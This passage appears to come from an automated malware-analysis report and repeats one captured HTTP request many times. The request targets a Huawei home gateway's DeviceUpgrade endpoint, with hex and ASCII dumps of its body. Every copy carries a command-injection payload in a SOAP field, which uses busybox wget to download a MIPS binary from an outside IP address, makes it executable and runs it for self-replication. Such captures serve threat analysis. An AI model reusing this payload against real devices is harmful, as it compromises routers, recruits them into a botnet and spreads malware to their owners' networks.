62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 